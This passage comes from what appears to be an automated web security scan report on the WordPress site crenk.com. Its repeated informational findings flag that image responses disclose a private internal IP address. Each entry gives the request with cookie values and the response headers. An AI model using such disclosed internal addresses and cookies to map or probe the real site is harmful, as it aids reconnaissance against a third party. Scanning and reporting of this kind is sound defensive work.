Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:16:07 GMT
Content-Length: 1494
Date: Thu, 12 May 2011 13:29:18 GMT
X-Varnish: 2340991808 2340948124
Age: 225
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...7.........).......tEXtSoftware.Adobe ImageReadyq.e<...xIDATx..XMO.W.~...0.uU.......Kh"....BR....Ee...,H$1....C.@.(..qa    .    ...Bij.B.    ]T...5..~.@.n}..}..s.y.y.........,..{.......PSS.
...[SNIP]...
17.7. http://crenk.com/wp-content/plugins/buddypress-share-it/img/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress-share-it/img/share.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress-share-it/img/share.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:16:07 GMT
Content-Length: 1840
Date: Thu, 12 May 2011 13:29:18 GMT
X-Varnish: 2340991792 2340948121
Age: 224
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...7.........).......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X{L.U....p.......TD.!
..0...k.....+][.?...lkk...m6..+3ef....uB.#.1..."...<...9..9.w~.^.....d.w..{.......'...|@....Z..a
...[SNIP]...
17.8. http://crenk.com/wp-content/plugins/buddypress-share-it/img/tweet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress-share-it/img/tweet.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress-share-it/img/tweet.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:16:08 GMT
Content-Length: 1731
Date: Thu, 12 May 2011 13:28:47 GMT
X-Varnish: 2340985745 2340948110
Age: 194
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...7.........).......tEXtSoftware.Adobe ImageReadyq.e<...eIDATx..X.oTE.....TZ.B[h.ma...j....A...4.&F..1..1.....1~..&&....@by..-P!...d[.XZ...h....{.3g....._.mno...3..;g.Td=..|./..={_k.
...[SNIP]...
17.9. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:13:51 GMT
Content-Length: 109
Date: Thu, 12 May 2011 13:28:47 GMT
X-Varnish: 2340985720 2340954468
Age: 159
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b......`........P....IEND.B`.
17.10. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925; bp-activity-oldestpage=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/gif
Last-Modified: Wed, 13 Apr 2011 15:13:52 GMT
Content-Length: 51
Date: Thu, 12 May 2011 13:29:23 GMT
X-Varnish: 2340992532 2340962412
Age: 152
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

GIF89a.............!.......,..........
....j.....;
17.11. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/gif
Last-Modified: Wed, 13 Apr 2011 15:13:56 GMT
Content-Length: 160
Date: Thu, 12 May 2011 13:29:22 GMT
X-Varnish: 2340992477 2340952464
Age: 206
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

GIF89a.......................................................!.......,..........MP.I.......`(.]a.h..l..C,.4@.x..D....pH,....r.l:..'bJ.Z...v..&...xL.....z.n....;
17.12. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:13:56 GMT
Content-Length: 115
Date: Thu, 12 May 2011 13:28:47 GMT
X-Varnish: 2340985728 2340954328
Age: 160
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR..............~.....    pHYs...........~....%IDAT(.c....h.    ....`Q..Up.h.*...@.E(....:&........IEND.B`.
17.13. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:18:49 GMT
Content-Length: 857
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992099 2340947280
Age: 232
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR..............|.0...    pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx...MH.Q...i.1......d"U.....j.M.h..Th.E.,
u.)t....uS.......-X
.._.V...j...Q.&...L&.`.U    .`
...
...[SNIP]...
17.14. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:18:50 GMT
Content-Length: 1106
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992133 2340947442
Age: 231
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR..............|.0...    pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx...ML.g..3.;.........@
KK*......@..k.F.4.....z.C/M...BB.=y..'/^...Hmm.jj..
.......|......Ka.
...[SNIP]...
17.15. http://crenk.com/wp-content/plugins/socialize/images/delicous.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/socialize/images/delicous.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/socialize/images/delicous.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 07 Mar 2011 10:43:37 GMT
Content-Length: 927
Date: Thu, 12 May 2011 13:29:22 GMT
X-Varnish: 2340992471 2340952295
Age: 207
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...2...<.....$5......tEXtSoftware.Adobe ImageReadyq.e<...AIDATx....k.Q...$...L...,..f..Bi....R...B.t#....t..(...................).M[5.yu2....$.&Q......?nr    .~s..qF.m...]A.AM...E.PK....4
...[SNIP]...
17.16. http://crenk.com/wp-content/uploads/2010/08/rss.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2010/08/rss.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2010/08/rss.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 04 Mar 2011 12:20:48 GMT
Content-Length: 1501
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992135 2340947277
Age: 232
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR... ... .....szz.....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.07/14/10pcVH...9IDATX...m.\....9.....M"M.k.,..&bZ.-.....*...R?X.`P....J
...[SNIP]...
17.17. http://crenk.com/wp-content/uploads/2010/08/twitter.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2010/08/twitter.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2010/08/twitter.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 04 Mar 2011 12:22:48 GMT
Content-Length: 946
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992134 2340947275
Age: 232
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR... ... .....szz.....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.07/14/10pcVH....IDATX.....]E..?gf...~.,1.....Ml..K..,.
V.K.>m.._ X...2+.
...[SNIP]...
17.18. http://crenk.com/wp-content/uploads/2010/08/youtube.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2010/08/youtube.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2010/08/youtube.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 04 Mar 2011 12:23:33 GMT
Content-Length: 1321
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992151 2340947279
Age: 232
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR... ... .....szz.....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.07/14/10pcVH....IDATX....kTW..?...L.....X.Z.vc.b..V[.h.J@..
.qa.E@tS\u#.
...[SNIP]...
17.19. http://crenk.com/wp-content/uploads/2011/03/android.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/03/android.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/03/android.jpg HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Mon, 21 Mar 2011 15:14:00 GMT
Content-Length: 9203
Date: Thu, 12 May 2011 13:29:22 GMT
X-Varnish: 2340992457 2340947485
Age: 233
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................d.,..
...[SNIP]...
17.20. http://crenk.com/wp-content/uploads/2011/03/apple-ipad-2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/03/apple-ipad-2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/03/apple-ipad-2.jpg HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Mon, 21 Mar 2011 15:14:01 GMT
Content-Length: 8864
Date: Thu, 12 May 2011 13:29:22 GMT
X-Varnish: 2340992440 2340947449
Age: 233
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................d.,..
...[SNIP]...
17.21. http://crenk.com/wp-content/uploads/2011/03/apple-news.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/03/apple-news.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/03/apple-news.jpg HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Mon, 21 Mar 2011 15:14:02 GMT
Content-Length: 8065
Date: Thu, 12 May 2011 13:29:22 GMT
X-Varnish: 2340992456 2340947451
Age: 233
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................d.,..
...[SNIP]...
17.22. http://crenk.com/wp-content/uploads/2011/04/bjkgdru.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/04/bjkgdru.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/bjkgdru.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 14 Apr 2011 10:48:15 GMT
Content-Length: 30219
Date: Thu, 12 May 2011 13:28:47 GMT
X-Varnish: 2340985706 2340954304
Age: 160
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR.................u.IDATx......Y....\....%D..4
]]..>g.....<.?....W..F>p....q....>.(-P.H.....G.k>.....9ft.2 Q.....^.[...vzz..A..8d2...,....gsV.G!...}. ...1....J\.{.4[x.<.....P*.X....E.
...[SNIP]...
17.23. http://crenk.com/wp-content/uploads/2011/04/crenkwriting1.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/04/crenkwriting1.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/crenkwriting1.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 20 Apr 2011 14:26:11 GMT
Content-Length: 12777
Date: Thu, 12 May 2011 13:29:20 GMT
X-Varnish: 2340992174 2340947448
Age: 231
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...,...d.....<.....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
17.24. http://crenk.com/wp-content/uploads/2011/04/header1.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/uploads/2011/04/header1.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/header1.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
